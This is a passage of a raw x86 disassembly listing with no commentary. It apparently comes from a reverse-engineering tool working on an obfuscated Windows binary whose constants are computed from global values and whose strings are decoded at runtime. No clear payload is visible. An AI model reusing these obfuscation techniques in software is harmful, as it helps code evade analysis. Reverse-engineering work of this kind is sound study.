add byte ptr [eax], 31h
loc_41FD14: ; CODE XREF: sub_41FC67+9F�j
; sub_41FC67+A3�j
mov eax, [ebp+var_4]
mov al, [edi+eax]
cmp al, 41h
jl short loc_41FD2A
cmp al, 5Ah
jg short loc_41FD2A
mov eax, [ebp+var_4]
add eax, edi
add byte ptr [eax], 20h
loc_41FD2A: ; CODE XREF: sub_41FC67+B5�j
; sub_41FC67+B9�j
inc [ebp+var_4]
loc_41FD2D: ; CODE XREF: sub_41FC67+95�j
movsx eax, word ptr ds:100131F0h
add eax, 5
cmp [ebp+var_4], eax
jb short loc_41FCFE
pop edi
leave
retn
sub_41FC67 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FD3F proc near ; CODE XREF: sub_41B22D+3C�p
; sub_41B22D+C4�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, [ebp+arg_0]
movzx ebx, byte ptr [eax]
movsx eax, word ptr ds:100130BCh
mov edx, ds:10013234h
lea eax, [eax+edx+0F3h]
imul ebx, eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+1]
add ebx, eax
movsx eax, word ptr ds:10013218h
add eax, 0FBh
imul ebx, eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+2]
add ebx, eax
mov eax, ds:10013280h
movsx edx, word ptr ds:100131B4h
mov esi, eax
add esi, edx
sub esi, 8
jmp short loc_41FDEA
; ---------------------------------------------------------------------------
loc_41FD99: ; CODE XREF: sub_41FD3F+B5�j
movsx edi, word ptr ds:10013208h
add edi, ds:10013224h
sub edi, 7
sub edi, esi
mov edx, [ebp+arg_4]
mov [ebp+var_4], edx
mov edx, ebx
and edx, 8000003Fh
jge short loc_41FDC0
dec edx
or edx, 0FFFFFFC0h
inc edx
loc_41FDC0: ; CODE XREF: sub_41FD3F+7A�j
mov ecx, ds:100132BCh
mov dl, [ecx+edx]
mov ecx, [ebp+var_4]
mov [ecx+edi], dl
mov eax, ebx
mov edi, ds:1001317Ch
add edi, 34h
mov ecx, edi
add ecx, ds:100130F4h
cdq
idiv ecx
mov ebx, eax
add esi, 1
loc_41FDEA: ; CODE XREF: sub_41FD3F+58�j
movsx eax, word ptr ds:10013208h
dec eax
cmp esi, eax
jl short loc_41FD99
pop edi
pop esi
pop ebx
leave
retn
sub_41FD3F endp
; ---------------------------------------------------------------------------
db 0B8h
dd 80004001h
db 0C2h, 10h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 230h
push ebx
push esi
push edi
mov esi, [ebp+8]
mov ebx, [ebp+0Ch]
mov eax, ebx
cmp eax, 100h
jz short loc_41FE34
jl loc_420372
cmp eax, 111h
jz loc_41FEC5
jmp loc_420372
; ---------------------------------------------------------------------------
loc_41FE34: ; CODE XREF: .data:0041FE1C�j
cmp dword ptr [ebp+10h], 9
jnz loc_420372
mov edi, ds:1001315Ch
sub edi, 9
jmp short loc_41FEB4
; ---------------------------------------------------------------------------
loc_41FE49: ; CODE XREF: .data:0041FEBE�j
mov eax, 30h
mul edi
mov [ebp-208h], eax
cmp ds:10010380h[eax], esi
jnz short loc_41FE7E
mov eax, 30h
mul edi
mov [ebp-20Ch], eax
push dword ptr ds:10010384h[eax]
call dword ptr ds:1000FA40h
jmp loc_420372
; ---------------------------------------------------------------------------
loc_41FE7E: ; CODE XREF: .data:0041FE5D�j
mov eax, 30h
mul edi
mov [ebp-20Ch], eax
cmp ds:10010384h[eax], esi
jnz short loc_41FEB3
mov eax, 30h
mul edi
mov [ebp-210h], eax
push dword ptr ds:10010388h[eax]
call dword ptr ds:1000FA40h
jmp loc_420372
; ---------------------------------------------------------------------------
loc_41FEB3: ; CODE XREF: .data:0041FE92�j
inc edi
loc_41FEB4: ; CODE XREF: .data:0041FE47�j
mov eax, ds:10013258h
add eax, 62h
cmp edi, eax
jb short loc_41FE49
jmp loc_420372
; ---------------------------------------------------------------------------
loc_41FEC5: ; CODE XREF: .data:0041FE29�j
mov eax, ds:10013134h
mov edi, eax
add edi, ds:10013224h
sub edi, 0Dh
jmp short loc_41FEF1
; ---------------------------------------------------------------------------
loc_41FED7: ; CODE XREF: .data:0041FF04�j
mov eax, 30h
mul edi
mov [ebp-208h], eax
mov eax, ds:1001038Ch[eax]
cmp [ebp+14h], eax
jz short loc_41FF06
inc edi
loc_41FEF1: ; CODE XREF: .data:0041FED5�j
movsx eax, word ptr ds:10013264h
mov edx, ds:10013288h
lea eax, [eax+edx+55h]
cmp edi, eax
jb short loc_41FED7
loc_41FF06: ; CODE XREF: .data:0041FEEE�j
mov eax, ds:10013258h
add eax, 5Eh
movsx edx, word ptr ds:10013180h
add eax, edx
cmp edi, eax
jz loc_420372
push 0FFh
lea eax, [ebp-103h]
push eax
mov eax, 30h
mul edi
mov [ebp-20Ch], eax
push dword ptr ds:10010378h[eax]
call dword ptr ds:10012BA4h
movsx eax, word ptr ds:10013124h
mov byte ptr [ebp+eax-20Ah], 4Bh
mov eax, ds:100130F8h
mov edx, ds:1001321Ch
sub edx, 8
mov [ebp+eax-20Ah], dl
lea eax, [ebp-103h]
push eax
lea eax, [ebp-204h]
push eax
call dword ptr ds:1000D020h
add esp, 8
push 0FFh
lea eax, [ebp-103h]
push eax
mov eax, 30h
mul edi
mov [ebp-210h], eax
push dword ptr ds:10010380h[eax]
call dword ptr ds:10012BA4h
mov eax, ds:100130F8h
add eax, ds:10013268h
movsx eax, byte ptr [ebp+eax-10Eh]
cmp eax, ds:10013248h
jnz short loc_420006
push 10013D6Dh
call sub_41C914
pop ecx
mov edx, ds:1001318Ch
add edx, ds:1001309Ch
sub edx, 5
push edx
push 0
push eax
push 0
call dword ptr ds:10012644h
mov eax, 30h
mul edi
mov [ebp-214h], eax
push dword ptr ds:10010380h[eax]
call dword ptr ds:1000FA40h
jmp loc_420372
; ---------------------------------------------------------------------------
loc_420006: ; CODE XREF: .data:0041FFBF�j
push 10013D68h
call sub_41C914
push eax
lea edx, [ebp-204h]
push edx
call dword ptr ds:1000D020h
lea eax, [ebp-103h]
push eax
lea eax, [ebp-204h]
push eax
call dword ptr ds:1000D020h
add esp, 14h
push 0FFh
lea eax, [ebp-103h]
push eax
mov eax, 30h
mul edi
mov [ebp-214h], eax
push dword ptr ds:10010384h[eax]
call dword ptr ds:10012BA4h
mov eax, ds:100131ACh
movsx eax, byte ptr [ebp+eax-108h]
mov edx, ds:10013184h
sub edx, 2
cmp eax, edx
jnz short loc_4200BA
push 10013D46h
call sub_41C914
pop ecx
mov edx, ds:1001319Ch
add edx, ds:1001325Ch
sub edx, 0Eh
push edx
push 0
push eax
push 0
call dword ptr ds:10012644h
mov eax, 30h
mul edi
mov [ebp-218h], eax
push dword ptr ds:10010384h[eax]
call dword ptr ds:1000FA40h
jmp loc_420372
; ---------------------------------------------------------------------------
loc_4200BA: ; CODE XREF: .data:00420073�j
push 10013D41h
call sub_41C914
push eax
lea edx, [ebp-204h]
push edx
call dword ptr ds:1000D020h
lea eax, [ebp-103h]
push eax
lea eax, [ebp-204h]
push eax
call dword ptr ds:1000D020h
add esp, 14h
push 0FFh
lea eax, [ebp-103h]
push eax
mov eax, 30h
mul edi
mov [ebp-218h], eax
push dword ptr ds:10010388h[eax]
call dword ptr ds:10012BA4h
movsx eax, word ptr ds:10013098h
movsx eax, byte ptr [ebp+eax-105h]
mov edx, ds:1001318Ch
add edx, ds:10013268h
sub edx, 4
cmp eax, edx
jz loc_42025C
lea ecx, [ebp-103h]
or eax, 0FFFFFFFFh
loc_42013E: ; CODE XREF: .data:00420143�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_42013E
mov ecx, ds:10013120h
sub ecx, 1
cmp eax, ecx
jb loc_42025C
movsx eax, word ptr ds:10013150h
add eax, ds:1001321Ch
sub eax, 10h
mov [ebp-105h], al
jmp short loc_420190
; ---------------------------------------------------------------------------
loc_42016E: ; CODE XREF: .data:004201A9�j
movzx eax, byte ptr [ebp-105h]
mov al, [ebp+eax-103h]
cmp al, 30h
jl short loc_420184
cmp al, 39h
jle short loc_420189
loc_420184: ; CODE XREF: .data:0042017E�j
jmp loc_42025C
; ---------------------------------------------------------------------------
loc_420189: ; CODE XREF: .data:00420182�j
add byte ptr [ebp-105h], 1
loc_420190: ; CODE XREF: .data:0042016C�j
lea ecx, [ebp-103h]
or eax, 0FFFFFFFFh
loc_420199: ; CODE XREF: .data:0042019E�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_420199
movzx ecx, byte ptr [ebp-105h]
cmp ecx, eax
jb short loc_42016E
mov eax, ds:10013280h
add eax, ds:100130D4h
sub eax, 0Ah
mov [ebp-104h], al
jmp short loc_420238
; ---------------------------------------------------------------------------
loc_4201C1: ; CODE XREF: .data:00420251�j
mov al, [ebp-104h]
mov [ebp-219h], al
jmp short loc_4201F8
; ---------------------------------------------------------------------------
loc_4201CF: ; CODE XREF: .data:00420211�j
movzx eax, byte ptr [ebp-219h]
movsx eax, byte ptr [ebp+eax-103h]
movzx edx, byte ptr [ebp-104h]
movsx edx, byte ptr [ebp+edx-103h]
cmp eax, edx
jnz short loc_420213
add byte ptr [ebp-219h], 1
loc_4201F8: ; CODE XREF: .data:004201CD�j
lea ecx, [ebp-103h]
or eax, 0FFFFFFFFh
loc_420201: ; CODE XREF: .data:00420206�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_420201
movzx ecx, byte ptr [ebp-219h]
cmp ecx, eax
jb short loc_4201CF
loc_420213: ; CODE XREF: .data:004201EF�j
movzx eax, byte ptr [ebp-219h]
movzx edx, byte ptr [ebp-104h]
sub eax, edx
movsx edx, word ptr ds:100130BCh
sub edx, 6
cmp eax, edx
jg short loc_42025C
add byte ptr [ebp-104h], 1
loc_420238: ; CODE XREF: .data:004201BF�j
lea ecx, [ebp-103h]
or eax, 0FFFFFFFFh
loc_420241: ; CODE XREF: .data:00420246�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_420241
movzx ecx, byte ptr [ebp-104h]
cmp ecx, eax
jb loc_4201C1
jmp loc_4202EB
; ---------------------------------------------------------------------------
loc_42025C: ; CODE XREF: .data:0042012F�j
; .data:00420150�j ...
mov eax, ds:100131C4h
add eax, 7CBh
push eax
call dword ptr ds:10012630h
push 10013D08h
call sub_41C914
mov [ebp-21Ch], eax
push 10013CF1h
call sub_41C914
movsx edx, word ptr ds:10013174h
sub edx, 7
push edx
push eax
mov edx, [ebp-21Ch]
push edx
push 0
call dword ptr ds:10012644h
push 10013CEDh
call sub_41C914
add esp, 10h
push eax
mov eax, 30h
mul edi
mov [ebp-220h], eax
mov edx, eax
push dword ptr ds:10010388h[edx]
call dword ptr ds:10012658h
mov eax, 30h
mul edi
mov [ebp-224h], eax
push dword ptr ds:10010388h[eax]
call dword ptr ds:1000FA40h
jmp loc_420372
; ---------------------------------------------------------------------------
loc_4202EB: ; CODE XREF: .data:00420257�j
push 10013CE8h
call sub_41C914
push eax
lea edx, [ebp-204h]
push edx
call dword ptr ds:1000D020h
lea eax, [ebp-103h]
push eax
lea eax, [ebp-204h]
push eax
call dword ptr ds:1000D020h
mov eax, 30h
mul edi
mov [ebp-228h], eax
push dword ptr ds:10010378h[eax]
call dword ptr ds:10010224h
lea eax, [ebp-204h]
push eax
call dword ptr ds:1000D04Ch
add esp, 18h
push 5
mov eax, 30h
mul edi
mov [ebp-22Ch], eax
push dword ptr ds:10010374h[eax]
call dword ptr ds:1001265Ch
mov eax, 30h
mul edi
mov [ebp-230h], eax
and dword ptr ds:10010370h[eax], 0
loc_420372: ; CODE XREF: .data:0041FE1E�j
; .data:0041FE2F�j ...
mov eax, ds:100130C8h
movsx edx, word ptr ds:100131B4h
mov edi, eax
add edi, edx
sub edi, 4
jmp loc_42045E
; ---------------------------------------------------------------------------
loc_42038A: ; CODE XREF: .data:0042046A�j
mov eax, 30h
mul edi
mov [ebp-8], eax
cmp esi, ds:10010380h[eax]
jnz short loc_4203C1
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp-0Ch], eax
push dword ptr ds:10010390h[eax]
call dword ptr ds:1001260Ch
jmp loc_420470
; ---------------------------------------------------------------------------
loc_4203C1: ; CODE XREF: .data:0042039B�j
mov eax, 30h
mul edi
mov [ebp-10h], eax
cmp esi, ds:10010384h[eax]
jnz short loc_4203F5
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp-14h], eax
push dword ptr ds:10010394h[eax]
call dword ptr ds:1001260Ch
jmp short loc_420470
; ---------------------------------------------------------------------------
loc_4203F5: ; CODE XREF: .data:004203D2�j
mov eax, 30h
mul edi
mov [ebp-18h], eax
cmp esi, ds:10010388h[eax]
jnz short loc_420429
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp-1Ch], eax
push dword ptr ds:10010398h[eax]
call dword ptr ds:1001260Ch
jmp short loc_420470
; ---------------------------------------------------------------------------
loc_420429: ; CODE XREF: .data:00420406�j
mov eax, 30h
mul edi
mov [ebp-20h], eax
cmp esi, ds:1001037Ch[eax]
jnz short loc_42045D
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp-24h], eax
push dword ptr ds:1001039Ch[eax]
call dword ptr ds:1001260Ch
jmp short loc_420470
; ---------------------------------------------------------------------------
loc_42045D: ; CODE XREF: .data:0042043A�j
inc edi
loc_42045E: ; CODE XREF: .data:00420385�j
movsx eax, word ptr ds:100130D8h
add eax, 62h
cmp edi, eax
jb loc_42038A
loc_420470: ; CODE XREF: .data:004203BC�j
; .data:004203F3�j ...
pop edi
pop esi
pop ebx
leave
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420477 proc near ; CODE XREF: sub_41AD81+247�p
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_28 = dword ptr -28h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
push 1
push [ebp+arg_4]
call sub_41C9F7
add esp, 8
mov [ebp+var_48], eax
test eax, eax
jnz loc_42069C
mov [ebp+var_18], 8
push 10013CD8h
call sub_41FB74
pop ecx
push eax
call dword ptr ds:1000D044h
mov [ebp+var_10], eax
lea eax, [ebp+var_8]
push eax
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_4]
push edi
mov edi, [edi]
call dword ptr [edi+30h]
mov ebx, eax
movsx eax, word ptr ds:100131A4h
sub eax, 7
cmp ebx, eax
jnz loc_420684
lea eax, [ebp+var_3C]
push eax
push 10014A68h
mov eax, [ebp+var_8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:10013280h
add eax, ds:1001320Ch
sub eax, 0Ah
cmp ebx, eax
jnz loc_42067B
mov [ebp+var_30], 2
mov eax, ds:10013164h
sub eax, 4
mov [ebp+var_28], eax
lea eax, [ebp+var_1C]
push eax
lea esi, [ebp+var_30]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_30]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_3C]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
mov eax, ds:10013288h
add eax, ds:10013184h
sub eax, 8
cmp ebx, eax
jnz loc_420672
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push 10014A78h
mov eax, [ebp+var_1C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word ptr ds:10013160h
dec eax
cmp ebx, eax
jnz loc_420669
inc dword ptr ds:1000F620h
movsx eax, word ptr ds:10013104h
add eax, 2
cmp ds:1000F620h, eax
jb short loc_4205C4
mov eax, ds:100130F4h
add eax, 3
mov ds:1000F620h, eax
push [ebp+var_4]
call sub_41B930
pop ecx
jmp loc_420660
; ---------------------------------------------------------------------------
loc_4205C4: ; CODE XREF: sub_420477+130�j
mov eax, ds:100130ACh
movsx edx, word ptr ds:100130D8h
add eax, edx
sub eax, 3
mov [ebp+var_4C], eax
lea eax, [ebp+var_44]
push eax
push dword ptr ds:10011640h
call sub_42088C
mov [ebp+var_34], eax
lea eax, [ebp+var_40]
push eax
push dword ptr ds:1000D018h
call sub_42088C
add esp, 10h
mov [ebp+var_38], eax
cmp [ebp+var_44], 0
jz short loc_420620
cmp [ebp+var_34], 0
jz short loc_420620
lea eax, [ebp+var_4C]
push eax
push [ebp+var_4]
push [ebp+var_44]
push [ebp+var_34]
call sub_41BA2F
add esp, 10h
loc_420620: ; CODE XREF: sub_420477+18C�j
; sub_420477+192�j
cmp [ebp+var_40], 0
jz short loc_420641
cmp [ebp+var_38], 0
jz short loc_420641
lea eax, [ebp+var_4C]
push eax
push [ebp+var_4]
push [ebp+var_40]
push [ebp+var_38]
call sub_41BA2F
add esp, 10h
loc_420641: ; CODE XREF: sub_420477+1AD�j
; sub_420477+1B3�j
push [ebp+var_34]
call dword ptr ds:1000F61Ch
push [ebp+var_38]
call dword ptr ds:1000F61Ch
push 0
push [ebp+arg_4]
call sub_41C9F7
add esp, 8
loc_420660: ; CODE XREF: sub_420477+148�j
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_420669: ; CODE XREF: sub_420477+114�j
mov eax, [ebp+var_1C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_420672: ; CODE XREF: sub_420477+E8�j
mov eax, [ebp+var_3C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_42067B: ; CODE XREF: sub_420477+94�j
mov eax, [ebp+var_8]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_420684: ; CODE XREF: sub_420477+66�j
lea eax, [ebp+var_18]
push eax
call dword ptr ds:10012BA0h
movsx eax, word ptr ds:100131E0h
sub eax, 3
cmp ebx, eax
jz short $+2
loc_42069C: ; CODE XREF: sub_420477+1B�j
pop edi
pop esi
pop ebx
leave
retn
sub_420477 endp
; ---------------------------------------------------------------------------
db 0B8h, 1, 40h
dd 18C28000h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4206A9 proc near ; CODE XREF: sub_41C19D+2CE�p
; sub_41D764+263�p
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = dword ptr -31Ch
var_316 = byte ptr -316h
var_212 = byte ptr -212h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 330h
push ebx
push esi
push edi
push [ebp+arg_4]
call dword ptr ds:10012630h
pop ecx
push [ebp+arg_0]
lea eax, [ebp+var_316]
push eax
call sub_423399
lea ecx, [ebp+var_316]
or eax, 0FFFFFFFFh
loc_4206D7: ; CODE XREF: sub_4206A9+33�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4206D7
mov edx, ds:100131C4h
add edx, ds:1001314Ch
sub edx, 0Ah
mov ebx, eax
sub ebx, edx
mov edx, ds:10013254h
sub edx, 9
mov [ebp+ebx+var_316], dl
mov eax, ds:10013268h
movsx edx, word ptr ds:100130A4h
mov edi, eax
add edi, edx
sub edi, 0Ah
loc_420714: ; CODE XREF: sub_4206A9+177�j
mov eax, edi
movsx ecx, word ptr ds:10013240h
mul ecx
mov [ebp+var_320], eax
movsx eax, [ebp+edi+var_316]
mov edx, [ebp+var_320]
mov [ebp+edx+var_212], al
mov eax, edi
movsx ecx, word ptr ds:100131F0h
dec ecx
mul ecx
mov [ebp+var_324], eax
mov eax, ds:100131F4h
movsx edx, word ptr ds:100130CCh
add eax, edx
sub eax, 0Ah
mov edx, [ebp+var_324]
add edx, eax
mov eax, ds:1001321Ch
sub eax, 8
mov [ebp+edx+var_212], al
movsx eax, [ebp+edi+var_316]
mov edx, ds:10013114h
sub edx, 8
cmp eax, edx
jnz loc_42081F
mov eax, edi
mov ecx, ds:10013270h
sub ecx, 2
mul ecx
mov [ebp+var_328], eax
mov eax, ds:100130F8h
add eax, ds:100130ECh
sub eax, 9
mov edx, [ebp+var_328]
add edx, eax
movsx eax, word ptr ds:1001316Ch
add eax, ds:10013164h
sub eax, 5
mov [ebp+edx+var_212], al
mov eax, ds:1001314Ch
mov [ebp+var_32C], eax
mov eax, edi
mov edx, [ebp+var_32C]
mov ecx, edx
add ecx, ds:10013204h
sub ecx, 5
mul ecx
mov [ebp+var_330], eax
mov eax, ds:1001314Ch
sub eax, 3
mov edx, [ebp+var_330]
add edx, eax
movsx eax, word ptr ds:100130B0h
movsx ecx, word ptr ds:10013124h
add eax, ecx
sub eax, 0Dh
mov [ebp+edx+var_212], al
jmp short loc_420825
; ---------------------------------------------------------------------------
loc_42081F: ; CODE XREF: sub_4206A9+DE�j
inc edi
jmp loc_420714
; ---------------------------------------------------------------------------
loc_420825: ; CODE XREF: sub_4206A9+174�j
cmp dword ptr ds:100132ACh, 0
jz short loc_420866
lea eax, [ebp+var_212]
push eax
push 0
call dword ptr ds:1000F604h
mov esi, eax
or esi, esi
jz short loc_420866
cmp dword ptr ds:100132B0h, 0
jz short loc_420887
mov eax, ds:1001313Ch
sub eax, 2
neg eax
push eax
lea eax, [ebp+var_212]
push eax
push 0
call dword ptr ds:1000D01Ch
loc_420866: ; CODE XREF: sub_4206A9+183�j
; sub_4206A9+198�j
push dword ptr ds:1000F614h
push dword ptr ds:10012610h
lea eax, [ebp+var_316]
push eax
call sub_421353
add esp, 0Ch
mov [ebp+var_31C], eax
loc_420887: ; CODE XREF: sub_4206A9+1A1�j
pop edi
pop esi
pop ebx
leave
retn
sub_4206A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42088C proc near ; CODE XREF: .data:0041DDDD�p
; sub_420477+16B�p ...
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
push 0
push 80h
push 3
push 0
push 3
push 80000000h
push [ebp+arg_0]
call dword ptr ds:10012788h
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_4208D5
cmp [ebp+arg_4], 0
jz short loc_4208D1
mov eax, [ebp+arg_4]
movsx edx, word ptr ds:100130BCh
add edx, ds:100131ACh
sub edx, 0Eh
mov [eax], edx
loc_4208D1: ; CODE XREF: sub_42088C+2E�j
xor eax, eax
jmp short loc_420919
; ---------------------------------------------------------------------------
loc_4208D5: ; CODE XREF: sub_42088C+28�j
push 0
push edi
call dword ptr ds:10012624h
mov esi, eax
add eax, 10h
push eax
push 40h
call dword ptr ds:1000FA34h
mov ebx, eax
push 0
cmp [ebp+arg_4], 0
jz short loc_4208FE
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
jmp short loc_420904
; ---------------------------------------------------------------------------
loc_4208FE: ; CODE XREF: sub_42088C+68�j
lea eax, [ebp+var_4]
mov [ebp+var_8], eax
loc_420904: ; CODE XREF: sub_42088C+70�j
push [ebp+var_8]
push esi
push ebx
push edi
call dword ptr ds:1000D028h
push edi
call dword ptr ds:10011654h
mov eax, ebx
loc_420919: ; CODE XREF: sub_42088C+47�j
pop edi
pop esi
pop ebx
leave
retn
sub_42088C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42091E proc near ; CODE XREF: sub_419F88+1CA�p
; sub_41B354+2D9�p ...
var_120A = byte ptr -120Ah
var_110B = byte ptr -110Bh
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 120Ch
call sub_423379
push ebx
push esi
push edi
push 100138A8h
call sub_41C914
push eax
lea edi, [ebp+var_FFF]
push edi
call dword ptr ds:10012634h
add esp, 0Ch
mov esi, ds:100131B8h
sub esi, 5
jmp short loc_42096E
; ---------------------------------------------------------------------------
loc_420954: ; CODE XREF: sub_42091E+56�j
cmp [ebp+esi+var_FFF], 23h
jnz short loc_42096D
mov eax, ds:100131F8h
sub eax, 3
mov [ebp+esi+var_FFF], al
loc_42096D: ; CODE XREF: sub_42091E+3E�j
inc esi
loc_42096E: ; CODE XREF: sub_42091E+34�j
cmp esi, 0FFFh
jb short loc_420954
mov eax, ds:100131B8h
sub eax, 5
mov [ebp+var_1004], eax
mov eax, ds:100130C4h
mov ebx, eax
add ebx, ds:100130C8h
sub ebx, 7
cmp [ebp+arg_0], 0
jnz short loc_4209F3
loc_42099A: ; CODE XREF: sub_42091E+D3�j
mov eax, [ebp+arg_4]
cmp [ebp+var_1004], eax
jnz short loc_4209BC
lea eax, [ebp+ebx+var_FFF]
push eax
push 10012670h
call sub_423399
jmp loc_420C46
; ---------------------------------------------------------------------------
loc_4209BC: ; CODE XREF: sub_42091E+85�j
lea ecx, [ebp+ebx+var_FFF]
or eax, 0FFFFFFFFh
loc_4209C6: ; CODE XREF: sub_42091E+AD�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4209C6
add ebx, eax
add ebx, 1
inc [ebp+var_1004]
movsx eax, [ebp+ebx+var_FFF]
mov edx, ds:1001315Ch
sub edx, 9
cmp eax, edx
jz loc_420C46
jmp short loc_42099A
; ---------------------------------------------------------------------------
loc_4209F3: ; CODE XREF: sub_42091E+7A�j
mov eax, ds:10013350h
mov [ebp+var_1008], eax
mov eax, ds:10013210h
add eax, ds:10013268h
sub eax, 5
mov edx, [ebp+arg_0]
mov ecx, ds:100130D4h
sub ecx, 6
mov [edx+eax], cl
mov eax, ds:1001309Ch
mov ebx, eax
add ebx, ds:1001318Ch
sub ebx, 5
mov eax, ds:100131D0h
add eax, ds:1001312Ch
sub eax, 0Fh
mov [ebp+var_1004], eax
loc_420A3F: ; CODE XREF: sub_42091E+300�j
push 1001389Dh
call sub_41C914
push eax
lea edi, [ebp+var_110B]
push edi
call sub_423399
lea eax, [ebp+ebx+var_FFF]
push eax
lea eax, [ebp+var_110B]
push eax
call dword ptr ds:1000D020h
add esp, 0Ch
call dword ptr ds:10012BACh
mov ecx, 14h
cdq
idiv ecx
mov [ebp+var_100C], edx
mov eax, ds:10013090h
add eax, ds:10013220h
sub eax, 5
cmp edx, eax
jnb loc_420B71
push [ebp+var_1008]
lea eax, [ebp+var_120A]
push eax
call sub_41AFF0
mov eax, ds:1001319Ch
movsx edx, word ptr ds:10013230h
add eax, edx
sub eax, 0Bh
push eax
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call sub_4188C2
add esp, 14h
mov edi, ds:10013220h
add edi, 0FFFBh
cmp eax, edi
jnz short loc_420B05
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call dword ptr ds:1000D020h
push 10013898h
call sub_41C914
push eax
push [ebp+arg_0]
call dword ptr ds:1000D020h
add esp, 14h
loc_420B05: ; CODE XREF: sub_42091E+1BE�j
mov eax, ds:100130DCh
sub eax, 2
push eax
lea eax, [ebp+var_120A]
push eax
push [ebp+arg_0]
call sub_4188C2
add esp, 0Ch
mov edi, ds:1001319Ch
add edi, 0FFF9h
cmp eax, edi
jnz short loc_420B6B
push 1001388Dh
call sub_41C914
push eax
push [ebp+arg_0]
call dword ptr ds:1000D020h
lea eax, [ebp+var_120A]
push eax
push [ebp+arg_0]
call dword ptr ds:1000D020h
push 10013888h
call sub_41C914
push eax
push [ebp+arg_0]
call dword ptr ds:1000D020h
add esp, 20h
loc_420B6B: ; CODE XREF: sub_42091E+210�j
inc [ebp+var_1008]
loc_420B71: ; CODE XREF: sub_42091E+174�j
push [ebp+var_1004]
call sub_41D0D6
pop ecx
mov [ebp+var_100C], eax
mov ecx, ds:100131A8h
cmp eax, ecx
jnb short loc_420BE9
movsx eax, word ptr ds:10013150h
sub eax, 7
push eax
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call sub_4188C2
add esp, 0Ch
movsx edi, word ptr ds:10013208h
mov edx, ds:1001313Ch
lea edi, [edi+edx+0FFF7h]
cmp eax, edi
jnz short loc_420BE9
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call dword ptr ds:1000D020h
push 10013883h
call sub_41C914
push eax
push [ebp+arg_0]
call dword ptr ds:1000D020h
add esp, 14h
loc_420BE9: ; CODE XREF: sub_42091E+26D�j
; sub_42091E+2A2�j
lea ecx, [ebp+ebx+var_FFF]
or eax, 0FFFFFFFFh
loc_420BF3: ; CODE XREF: sub_42091E+2DA�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_420BF3
add ebx, eax
add ebx, 1
inc [ebp+var_1004]
movsx eax, [ebp+ebx+var_FFF]
mov edx, ds:1001326Ch
add edx, ds:10013090h
sub edx, 0Ch
cmp eax, edx
jnz loc_420A3F
push 1001387Eh
call sub_41C914
push eax
push [ebp+arg_0]
call dword ptr ds:1000D020h
add esp, 0Ch
mov eax, [ebp+var_1008]
mov ds:10013350h, eax
loc_420C46: ; CODE XREF: sub_42091E+99�j
; sub_42091E+CD�j
pop edi
pop esi
pop ebx
leave
retn
sub_42091E endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
